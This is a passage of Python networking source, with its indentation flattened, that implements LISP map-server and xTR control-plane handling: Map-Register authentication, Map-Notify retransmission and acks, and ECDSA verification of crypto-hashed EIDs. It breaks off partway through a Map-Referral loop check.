packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to the xTR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This function will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# The (S,G) RLOC-set could be empty when the last RLE goes away. We will
# have to search all individual registrations looking for RTRs.
#
# We store them in a dictionary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set).
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead of the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs found.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
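#
# For reference, the JSON carried in a signature RLOC-record is expected to
# look roughly like the following (values illustrative only), which is why
# the decode above checks for a "signature" key and lisp_verify_cga_sig()
# optionally looks for "signature-eid":
#
#   { "signature-eid" : "<ipv6-crypto-eid>", "signature" : "<base64-sig>" }
#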
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
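#
# Worked example using the EID from the header comment: with a matching
# eid-prefix of mask-length 8, hash_mask_len is 128 - 8 = 120. The loop
# emits 120/16 = 7 full 16-bit chunks plus one trailing 8-bit chunk, so EID
# fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 returns the EID-hash string
# "4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430".
#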
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_eid, pubkey, True/False]. Values can be None; the last boolean
# indicates whether the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use the signature-eid if it is in the JSON string. Otherwise, the crypto-EID
# is the signature-EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup the CGA hash in the mapping database to get the public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer and a Python verifier. The signature data must go through
# a sha256 hash first. A Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
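#
# Sketch of the matching signer side (assuming the python-ecdsa library and
# a NIST256p key, per the note above). The signature verified here would be
# produced roughly as follows and then base64-encoded into the "signature"
# JSON key:
#
#   key = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
#   sig = key.sign(sig_eid.print_address(), hashfunc=hashlib.sha256)
#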
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the concatenation of the xTR address and
# the map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list whether any EID is in the EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non-encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse the first 4 bytes, which are not encrypted. If the packet is not
# encrypted, return to the caller. If it is encrypted, get the 3-bit key-id
# next to the e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
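#
# For illustration: after the ntohl() above, the e-bit sits at bit 13 of the
# first 32-bit word and the 3-bit key-id at bits 14-16. So a header with
# e_bit == 1 and ekey_id == 1 selects lisp_ms_encryption_keys[1], and the
# bytes after the first 4 are ChaCha-decrypted with that key.
#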
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return an unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allow overlapping ams-registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge is being requested, get the individual site-eid. If not, and
# what was cached had the merge bit set, set a flag to issue an error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister the entry if the source of the Map-Register is
# in the list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for this site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Notify to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process has already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
# Gleaned map-cache entries always override what is registered in
# the mapping system, since the mapping system RLE entries are RTRs
# and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get the map-server so we can do statistics and find the auth-key, if an
# auth-key was provided in the Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over the packet header so
# lisp_send_map_notify_ack() starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably an RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endif
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if the arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
